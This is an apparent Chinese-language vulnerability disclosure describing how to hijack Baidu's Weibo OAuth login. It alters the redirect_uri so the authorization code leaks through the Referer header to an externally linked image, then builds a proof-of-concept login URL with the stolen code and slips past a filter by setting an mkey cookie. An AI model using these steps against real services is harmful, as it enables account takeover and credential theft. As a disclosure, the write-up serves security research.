百度第三方登陆（微博）劫持用户登录凭据

漏洞挖掘

1、打开Url：https://www.baidu.com/

2、点击登陆后来到如下啊Url

https://api.weibo.com/oauth2/authorize?client_id=2512457640&response_type=code&redirect_uri=https%3A%2F%2Fpassport.baidu.com%2Fphoenix%2Faccount%2Fafterauth%3Fmkey%3Dphoenix2Wr8brm6JqFmSNRhBCANII0yb&forcelogin=1&state=1536842693&display=page&traceid=

注意①：这里的mkey为phoenix2Wr8brm6JqFmSNRhBCANII0yb

然后将redirect_uri的值修改为https://developer.baidu.com/forum/topic/show/292456?pageNo=1（这里面有我外链的图片，如下）

修改后的Url是

https://api.weibo.com/oauth2/authorize?client_id=2512457640&response_type=code&redirect_uri=https://developer.baidu.com/forum/topic/show/292456?pageNo=1&forcelogin=1&state=1536842693&display=page&traceid=

然后访问一下

3、查看外链的Referer值

获取的code是c3425c10c896457a939c18fbd8d9eac6，然后我们将其构造为登陆的POC

4、构造POC

https://passport.baidu.com/phoenix/account/afterauth?mkey=phoenix2Wr8brm6JqFmSNRhBCANII0yb&state=1536832610&code=c3425c10c896457a939c18fbd8d9eac6

5、然后访问一下POC

这里测试的时候发现怎么样都登陆不了，然后我研究了一下发现有过滤，但是可以绕过~ 往cookie里面加mkey然后值为Url中的mkey就可以了，如图